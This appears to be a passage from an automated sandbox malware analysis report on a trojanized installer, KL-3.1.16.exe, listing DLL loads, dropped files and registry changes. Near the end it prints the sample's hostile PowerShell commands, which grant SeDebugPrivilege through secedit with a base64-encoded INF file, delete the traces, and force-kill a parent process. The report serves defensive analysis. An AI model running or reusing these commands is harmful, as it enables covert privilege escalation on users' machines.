Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: profapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: propsys.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: twext.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: slc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: userenv.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sppc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: policymanager.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: msvcp110_win.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: ntshrui.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: cscapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: twinapi.appcore.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: textshaping.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: starttiledata.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: acppage.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sfc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: msi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: aepic.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sfc_os.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: edputil.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: netutils.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: mpr.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: ndfapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wdi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: duser.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: atlthunk.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: textinputframework.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: coreuicomponents.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wininet.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: taskschd.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll

Source: C:\Users\user\Desktop\KL-3.1.16.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File written: C:\inst.ini

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Directory created: C:\Program Files\product1\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Directory created: C:\Program Files\product1\letsvpn-latest.exe			Jump to behavior

Source: KL-3.1.16.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: KL-3.1.16.exe

Static file information: File size 21267097 > 1048576

Source: KL-3.1.16.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb source: 5ar6QsR4e.exe, 00000012.00000003.2387351335.00000000011D0000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000003.2434916661.0000000000820000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb% source: 5ar6QsR4e.exe, 00000012.00000003.2387351335.00000000011D0000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000021.00000003.2434916661.0000000000820000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9AD

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=6980').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=6980').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}	Jump to behavior
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"

Source: C:\Users\user\Desktop\KL-3.1.16.exe

Code function: 0_2_00007FF6F9255D98 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00007FF6F9255D98

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: irsetup.exe.0.dr	Static PE information: real checksum: 0x4f4144 should be: 0x4f9bcf
Source: 5ar6QsR4e.exe.2.dr	Static PE information: real checksum: 0x2bf314 should be: 0x2d02ed
Source: iusb3mon.exe.18.dr	Static PE information: real checksum: 0x2bf314 should be: 0x2d02ed

Source: irsetup.exe.0.dr	Static PE information: section name: text
Source: 5ar6QsR4e.exe.2.dr	Static PE information: section name:
Source: 5ar6QsR4e.exe.2.dr	Static PE information: section name:
